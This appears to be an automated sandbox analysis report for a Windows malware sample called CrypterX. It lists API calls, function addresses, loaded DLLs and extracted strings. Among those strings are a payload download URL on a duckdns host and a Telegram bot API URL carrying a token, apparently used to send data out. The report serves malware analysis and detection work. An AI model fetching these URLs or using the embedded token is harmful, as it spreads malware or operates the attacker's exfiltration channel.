Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Code function: 0_2_00007FF7B3294244 CertGetNameStringA,CertFindExtension,CryptDecodeObjectEx,wcslen, |
0_2_00007FF7B3294244 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Code function: 0_2_00007FF7B327E6A4 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext, |
0_2_00007FF7B327E6A4 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Code function: 0_2_00007FF7B327F970 memset,CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, |
0_2_00007FF7B327F970 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Code function: 0_2_00007FF7B327F0EC memset,_strdup,fopen,free,fseek,ftell,fread,fclose,free,fseek,malloc,strlen,malloc,MultiByteToWideChar,PFXImportCertStore,free,free,GetLastError,CertFindCertificateInStore,GetLastError,CertCloseStore,free,CertOpenStore,GetLastError,free,free,free,CryptStringToBinaryA,free,CertFindCertificateInStore,free,CertCloseStore,calloc,CertFreeCertificateContext,CertFreeCertificateContext,free, |
0_2_00007FF7B327F0EC |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Code function: 0_2_00007FF7B3299E70 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, |
0_2_00007FF7B3299E70 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Code function: 0_2_00007FF7B3299E60 CryptHashData, |
0_2_00007FF7B3299E60 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Code function: 0_2_00007FF7B3293D58 strlen,strlen,CryptQueryObject,CertAddCertificateContextToStore,CertFreeCertificateContext,GetLastError,GetLastError, |
0_2_00007FF7B3293D58 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Code function: 0_2_00007FF7B3299E14 CryptAcquireContextA,CryptCreateHash, |
0_2_00007FF7B3299E14 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Code function: 0_2_00007FF7B329A438 FindClose,abort,FindFirstFileExW,GetLastError, |
0_2_00007FF7B329A438 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Code function: 0_2_00007FF7B329A4AC GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,CloseHandle,CloseHandle,abort, |
0_2_00007FF7B329A4AC |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 4_2_00007FF7B0ADADF0 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,WaitForInputIdle,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, |
4_2_00007FF7B0ADADF0 |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 4_2_00007FF7B0AC40CC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, |
4_2_00007FF7B0AC40CC |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 4_2_00007FF7B0AEF900 FindFirstFileExA, |
4_2_00007FF7B0AEF900 |
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
String found in binary or memory: http://decimate.online |
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
String found in binary or memory: http://decimate.onlinehey |
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe, 00000000.00000002.1511313946.0000017017F1C000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://puredgb.duckdns.org:30000/xmg8oxqt/ping.exe |
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe, 00000000.00000002.1511313946.0000017017F1C000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://puredgb.duckdns.org:30000/xmg8oxqt/ping.exe.dlll: |
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe, 00000000.00000002.1511313946.0000017017F1C000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://puredgb.duckdns.org:30000/xmg8oxqt/ping.exel |
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe, 00000000.00000002.1511313946.0000017017F1C000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://puredgb.duckdns.org:30000/xmg8oxqt/ping.exew |
Source: curl.exe, 00000008.00000002.1533438725.000001FB15808000.00000004.00000020.00020000.00000000.sdmp, tmp.vbs.0.dr, ping.bat.4.dr |
String found in binary or memory: https://api.telegram.org/bot6745390378:AAE-OclYKCeZrtg1BPEW2LqGF2ln2iBb-Ow/sendMessage?chat_id=69151 |
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
String found in binary or memory: https://curl.se/docs/alt-svc.html |
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
String found in binary or memory: https://curl.se/docs/alt-svc.html# |
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
String found in binary or memory: https://curl.se/docs/hsts.html |
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
String found in binary or memory: https://curl.se/docs/hsts.html# |
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
String found in binary or memory: https://curl.se/docs/http-cookies.html |
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
String found in binary or memory: https://curl.se/docs/http-cookies.html# |
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
String found in binary or memory: https://ibb.co/pjHVbzL). |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Code function: 0_2_00007FF7B32328A8 |
0_2_00007FF7B32328A8 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Code function: 0_2_00007FF7B3276BEC |
0_2_00007FF7B3276BEC |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Code function: 0_2_00007FF7B3235AE8 |
0_2_00007FF7B3235AE8 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Code function: 0_2_00007FF7B327796C |
0_2_00007FF7B327796C |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Code function: 0_2_00007FF7B3245F20 |
0_2_00007FF7B3245F20 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Code function: 0_2_00007FF7B3249EAC |
0_2_00007FF7B3249EAC |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Code function: 0_2_00007FF7B329043C |
0_2_00007FF7B329043C |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Code function: 0_2_00007FF7B3241494 |
0_2_00007FF7B3241494 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Code function: 0_2_00007FF7B329A4AC |
0_2_00007FF7B329A4AC |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Code function: 0_2_00007FF7B3260358 |
0_2_00007FF7B3260358 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Code function: 0_2_00007FF7B32403A4 |
0_2_00007FF7B32403A4 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Code function: 0_2_00007FF7B32643D8 |
0_2_00007FF7B32643D8 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Code function: 0_2_00007FF7B3280280 |
0_2_00007FF7B3280280 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Code function: 0_2_00007FF7B32632E0 |
0_2_00007FF7B32632E0 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Code function: 0_2_00007FF7B326D174 |
0_2_00007FF7B326D174 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Code function: 0_2_00007FF7B3272890 |
0_2_00007FF7B3272890 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Code function: 0_2_00007FF7B3293878 |
0_2_00007FF7B3293878 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Code function: 0_2_00007FF7B328C85C |
0_2_00007FF7B328C85C |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Code function: 0_2_00007FF7B32888CC |
0_2_00007FF7B32888CC |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Code function: 0_2_00007FF7B32538BC |
0_2_00007FF7B32538BC |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Code function: 0_2_00007FF7B322A8F8 |
0_2_00007FF7B322A8F8 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Code function: 0_2_00007FF7B327D644 |
0_2_00007FF7B327D644 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Code function: 0_2_00007FF7B323F694 |
0_2_00007FF7B323F694 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Code function: 0_2_00007FF7B325366C |
0_2_00007FF7B325366C |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Code function: 0_2_00007FF7B3264658 |
0_2_00007FF7B3264658 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Code function: 0_2_00007FF7B3263698 |
0_2_00007FF7B3263698 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Code function: 0_2_00007FF7B3237594 |
0_2_00007FF7B3237594 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Code function: 0_2_00007FF7B3265C48 |
0_2_00007FF7B3265C48 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Code function: 0_2_00007FF7B329BC4A |
0_2_00007FF7B329BC4A |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Code function: 0_2_00007FF7B3280C80 |
0_2_00007FF7B3280C80 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Code function: 0_2_00007FF7B3279D0C |
0_2_00007FF7B3279D0C |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Code function: 0_2_00007FF7B324AB5C |
0_2_00007FF7B324AB5C |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Code function: 0_2_00007FF7B3298BB8 |
0_2_00007FF7B3298BB8 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Code function: 0_2_00007FF7B3251BC4 |
0_2_00007FF7B3251BC4 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Code function: 0_2_00007FF7B3263BB0 |
0_2_00007FF7B3263BB0 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Code function: 0_2_00007FF7B324CB9C |
0_2_00007FF7B324CB9C |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Code function: 0_2_00007FF7B328EA70 |
0_2_00007FF7B328EA70 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Code function: 0_2_00007FF7B3223AD0 |
0_2_00007FF7B3223AD0 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Code function: 0_2_00007FF7B322BAD8 |
0_2_00007FF7B322BAD8 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Code function: 0_2_00007FF7B32850C4 |
0_2_00007FF7B32850C4 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Code function: 0_2_00007FF7B327F0EC |
0_2_00007FF7B327F0EC |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Code function: 0_2_00007FF7B326EF34 |
0_2_00007FF7B326EF34 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Code function: 0_2_00007FF7B3263F96 |
0_2_00007FF7B3263F96 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Code function: 0_2_00007FF7B3266F74 |
0_2_00007FF7B3266F74 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Code function: 0_2_00007FF7B3232E60 |
0_2_00007FF7B3232E60 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Code function: 0_2_00007FF7B3260EAC |
0_2_00007FF7B3260EAC |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Code function: 0_2_00007FF7B3255EF0 |
0_2_00007FF7B3255EF0 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Code function: 0_2_00007FF7B324BD24 |
0_2_00007FF7B324BD24 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Code function: 0_2_00007FF7B3281D78 |
0_2_00007FF7B3281D78 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Code function: 0_2_00007FF7B3263D80 |
0_2_00007FF7B3263D80 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Code function: 0_2_00007FF7B3253E00 |
0_2_00007FF7B3253E00 |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 4_2_00007FF7B0ACA1CC |
4_2_00007FF7B0ACA1CC |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 4_2_00007FF7B0AE03B4 |
4_2_00007FF7B0AE03B4 |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 4_2_00007FF7B0ABF8F0 |
4_2_00007FF7B0ABF8F0 |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 4_2_00007FF7B0ADCAE8 |
4_2_00007FF7B0ADCAE8 |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 4_2_00007FF7B0ADADF0 |
4_2_00007FF7B0ADADF0 |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 4_2_00007FF7B0AB5E30 |
4_2_00007FF7B0AB5E30 |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 4_2_00007FF7B0AC11D4 |
4_2_00007FF7B0AC11D4 |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 4_2_00007FF7B0AF21B0 |
4_2_00007FF7B0AF21B0 |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 4_2_00007FF7B0ABC308 |
4_2_00007FF7B0ABC308 |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 4_2_00007FF7B0ABA304 |
4_2_00007FF7B0ABA304 |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 4_2_00007FF7B0ACB250 |
4_2_00007FF7B0ACB250 |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 4_2_00007FF7B0AB7288 |
4_2_00007FF7B0AB7288 |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 4_2_00007FF7B0AEC498 |
4_2_00007FF7B0AEC498 |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 4_2_00007FF7B0AD35C4 |
4_2_00007FF7B0AD35C4 |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 4_2_00007FF7B0AE8600 |
4_2_00007FF7B0AE8600 |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 4_2_00007FF7B0AB76C0 |
4_2_00007FF7B0AB76C0 |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 4_2_00007FF7B0AD2710 |
4_2_00007FF7B0AD2710 |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 4_2_00007FF7B0AEF6F4 |
4_2_00007FF7B0AEF6F4 |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 4_2_00007FF7B0ACC688 |
4_2_00007FF7B0ACC688 |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 4_2_00007FF7B0ABA66C |
4_2_00007FF7B0ABA66C |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 4_2_00007FF7B0AD47F8 |
4_2_00007FF7B0AD47F8 |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 4_2_00007FF7B0AF5758 |
4_2_00007FF7B0AF5758 |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 4_2_00007FF7B0AC58D4 |
4_2_00007FF7B0AC58D4 |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 4_2_00007FF7B0ACB8AC |
4_2_00007FF7B0ACB8AC |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 4_2_00007FF7B0AB4840 |
4_2_00007FF7B0AB4840 |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 4_2_00007FF7B0AE887C |
4_2_00007FF7B0AE887C |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 4_2_00007FF7B0AD29B8 |
4_2_00007FF7B0AD29B8 |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 4_2_00007FF7B0AB1AA4 |
4_2_00007FF7B0AB1AA4 |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 4_2_00007FF7B0AD8A54 |
4_2_00007FF7B0AD8A54 |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 4_2_00007FF7B0AE03B4 |
4_2_00007FF7B0AE03B4 |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 4_2_00007FF7B0AC1A5C |
4_2_00007FF7B0AC1A5C |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 4_2_00007FF7B0AD1B80 |
4_2_00007FF7B0AD1B80 |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 4_2_00007FF7B0AF1CE0 |
4_2_00007FF7B0AF1CE0 |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 4_2_00007FF7B0ACAC34 |
4_2_00007FF7B0ACAC34 |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 4_2_00007FF7B0AD1E30 |
4_2_00007FF7B0AD1E30 |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 4_2_00007FF7B0ACEE74 |
4_2_00007FF7B0ACEE74 |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 4_2_00007FF7B0AD30E4 |
4_2_00007FF7B0AD30E4 |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 4_2_00007FF7B0AD5050 |
4_2_00007FF7B0AD5050 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Section loaded: apphelp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Section loaded: msvcp140.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Section loaded: vcruntime140.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Section loaded: vcruntime140_1.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Section loaded: vcruntime140.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Section loaded: secur32.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Section loaded: iphlpapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Section loaded: mswsock.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Section loaded: dnsapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Section loaded: rasadhlp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Section loaded: fwpuclnt.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: apphelp.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: dxgidebug.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: sfc_os.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: rsaenh.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: uxtheme.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: dwmapi.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: cryptbase.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: riched20.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: usp10.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: msls31.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: windowscodecs.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: textshaping.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: textinputframework.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: coreuicomponents.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: coremessaging.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: ntmarta.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: wintypes.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: wintypes.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: wintypes.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: windows.storage.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: wldp.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: propsys.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: edputil.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: urlmon.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: iertutil.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: srvcli.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: netutils.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: windows.staterepositoryps.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: policymanager.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: msvcp110_win.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: appresolver.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: bcp47langs.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: slc.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: sppc.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: userenv.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: onecorecommonproxystub.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: onecoreuapcommonproxystub.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: pcacli.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: mpr.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: windows.fileexplorer.common.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: apphelp.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: ntshrui.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: cscapi.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: uxtheme.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: sxs.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: vbscript.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: amsi.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: userenv.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
